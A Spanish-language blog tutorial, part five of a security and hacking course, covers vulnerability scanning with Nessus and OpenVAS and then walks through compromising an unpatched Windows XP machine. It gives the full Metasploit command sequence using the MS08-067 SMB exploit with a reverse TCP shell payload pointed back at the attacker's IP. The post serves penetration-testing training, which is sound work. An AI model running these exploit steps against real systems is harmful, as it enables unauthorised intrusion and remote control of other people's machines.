Curso de seguridad y hacking – Parte 5 – Escaneo con nessus, openvas y un hackeo con metasploit

Published:

En esta nueva clase, vamos a hacer un escaneo usando Nessus y Openvas, configurados en el video anterior.

openvas

Una vez que entendamos como buscar vulnerabilidades vamos a ver un ejemplo de como hackear un windows xp, que a propósito no tiene actualizaciones para comprobar lo simple que puede ser hackear un equipo sin tener los parches de seguridad. La herramienta que vamos usar es Metasploit framework 2, que viene con backtrack 5.1.
Metasploit: es una herramienta para hacer test de penetracion de sistemas. El proyecto metasploit framework, se ha transformado casi en indispensable, y tiene un desarrollo constante.
Inicialmente se desarrollo en Perl pero actualmente se ha programado en ruby. Algo muy bueno es que es open source, por lo que se puede modificar a gusto y claro esta es gratis.

Guía del video, uso de metasploit:

  • cd /pentest/exploits/framework2/
  • Ejecutar: # msfconsole
  • use exploit/windows/smb/ms08_netapi
  • show options
  • set RHOST ipobjetivo
  • show options
  • set PAYLOAD windows/shell/reverse_tcp
  • show options
  • set LHOST myip
  • show options
  • exploit
- Advertisement -
Jorge
Jorgehttps://nksistemas.com
Soy Jorge, Sr Sysadmin Linux/DevOps/SRE y creador de NKSistemas.com Trabajo con plataformas: Linux, Windows, AWS, GCP, VMware, Helm, kubernetes, Docker, etc.

Related articles

Ads Blocker Image Powered by Code Help Pro

Se detecto un bloqueador de publicidad!!!

Nuestro contenido es 100% gratuito, por favor colabora con nosotros, permite la publicidad y disfruta del contenido.